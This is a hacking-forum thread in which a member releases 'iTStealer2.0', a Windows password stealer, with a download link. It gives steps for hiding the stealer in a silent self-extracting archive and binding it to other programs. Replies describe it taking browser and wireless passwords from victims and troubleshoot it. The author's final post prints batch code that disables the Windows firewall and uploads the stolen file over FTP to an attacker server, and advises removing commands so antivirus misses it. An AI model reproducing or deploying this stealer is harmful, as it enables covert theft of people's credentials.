Author Topic: iTStealer2.0  (Read 4041 times)

0 Members and 7 Guests are viewing this topic.

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
iTStealer2.0
« on: November 26, 2010, 08:14:55 am »
Hello all. Ok well this is my first AutoIt Script which I used in conjunction with my new stealer script. I Though I would release it more app like... Anyways whats the differance?

Changelog
  • Nirsoft Downloader
  • FTP Information Generator *No batch scripting knowledge required*
  • Melts Completely
  • Cleans up after itself better (completely this time)

Any questions or comments please PM/Email/Post here ;)



Now there is also a new source for the stealer.bat to implement the changes ;)

Download (Source in SRC folder):
http://upload.evilzone.org/download.php?id=387203&type=rar

How to use:

1. Run iTStealer2.0.exe and select File-->Open
2. Select the stealer batch file
3. Edit the Server, Username, and Password information
4. Press OK and update the file
5. Close
6. Add iTStealer2.0.bat, ea-rce.dll, ea-rce.exe, start.vbs, and wget.exe into a self extracting archive.
7. Go to Advanced and edit SFX Options
8. In the "Path to extract" type in "%temp%\stealer"
9. In the "Run after extraction" type in "%temp%\stealer\start.vbs"
10. Under the Modes tab, select "Hide All" and under update then select "Overwrite All Files"
11. Then press Ok and Enjoy... You can then bind with other programs or whatever you want ;)
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Infinityexists

  • Guest
Re: iTStealer2.0
« Reply #1 on: February 12, 2012, 11:03:24 am »
Virus Found BAT/Killwin in your iTStealer file .

btw, whose Ftp details should we provided ? , sorry for being an idiot.

and what it actually do ?

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: iTStealer2.0
« Reply #2 on: February 12, 2012, 12:59:34 pm »
Being an idiot is not an excuse to stupid questions.
You must provide your FTP details obviously. This is also not a virus - itphoenix is a respected member, I can assure you he wouldn't infect anyone...

And this as I recall steals information from the computer using Nirsoft utilities.

Infinityexists

  • Guest
Re: iTStealer2.0
« Reply #3 on: February 17, 2012, 12:29:04 pm »
I've successfuly generated a file but on running , it doesn't upload any thing on my FTP server :S i provided everything correctly.

What the problem ?

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: iTStealer2.0
« Reply #4 on: February 17, 2012, 04:35:11 pm »
I've successfuly generated a file but on running , it doesn't upload any thing on my FTP server :S i provided everything correctly.

What the problem ?


Filepermissions perhaps?
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline Axon

  • VIP
  • King
  • *
  • Posts: 2047
  • Cookies: 319
    • View Profile
Re: iTStealer2.0
« Reply #5 on: February 18, 2012, 11:31:46 pm »
This looks great, but the author didn't specify which kind of passwords this tool can steal

Infinityexists

  • Guest
Re: iTStealer2.0
« Reply #6 on: February 19, 2012, 05:28:36 pm »
file permission is not an issue because i created a VBscript program to upload file to server and it is working fine,
There is some issue in your stealer and i think nirsoft apps that you are using are outdated, i manually downloaded each of them and save passwords inside chrome/mozilla but nirsoft password detector hasn't detect any of them

Infinityexists

  • Guest
Re: iTStealer2.0
« Reply #7 on: February 19, 2012, 05:29:55 pm »
This looks great, but the author didn't specify which kind of passwords this tool can steal

This tool steals chrome, firefox, ie, Wireless passwords from the victims pc and upload them to your server

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: iTStealer2.0
« Reply #8 on: February 19, 2012, 11:26:12 pm »
file permission is not an issue because i created a VBscript program to upload file to server and it is working fine,
There is some issue in your stealer and i think nirsoft apps that you are using are outdated, i manually downloaded each of them and save passwords inside chrome/mozilla but nirsoft password detector hasn't detect any of them


Then you must have miss configured it. Iirc, this stealer downloads the newest versions but i could be wrong.

Also, dont double post. You can edit your previous post instead.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Infinityexists

  • Guest
Re: iTStealer2.0
« Reply #9 on: February 20, 2012, 06:20:55 pm »
Then you must have miss configured it. Iirc, this stealer downloads the newest versions but i could be wrong.

Also, dont double post. You can edit your previous post instead.

I've done everything absolutely correct but still it doesn't work,
and yes this stealer downloads the newest versions of nirsoft from their website

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: iTStealer2.0
« Reply #10 on: February 21, 2012, 09:40:29 am »
My breakdown goes more into depth but I will explain a few things. The FTP transfer part are these lines:

Code: [Select]
:disablefirewall
netsh firewall set opmode disable

:ftpinfo
echo open ftpserver>ftp.iTp
echo user ftpusername>>ftp.iTp
echo ftppassword>>ftp.iTp
echo send %USERNAME%-%num%.txt>>ftp.iTp
echo bye>>ftp.iTp

:ftptransfer
ftp.exe -n -i -s:c:\steal\ftp.iTp

The GUI is meant to simplify things, but it may just complicate things. You can change the variables in there.

As for it being outdated, you are incorrect it always downloads the latest nirsoft tools from the server.

The virus that is detected is the commands used to disable viruses. 9/10 times it doesn't work so it can be removed to make it undetectable.

The issue you might be having is depending if your using a firewall that blocks outgoing ftp transfers. This stealer is simple and only disables the Windows Firewalls.

The main purpose of this batch file is to show what you can do with a batch file and take information from one of the most insecure operating systems known to man. Windows gives you a text editor and the ability to create and run batch files that could give a hacker knowledge of the system and gain access to private information.
« Last Edit: February 21, 2012, 08:08:11 pm by iTpHo3NiX »
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry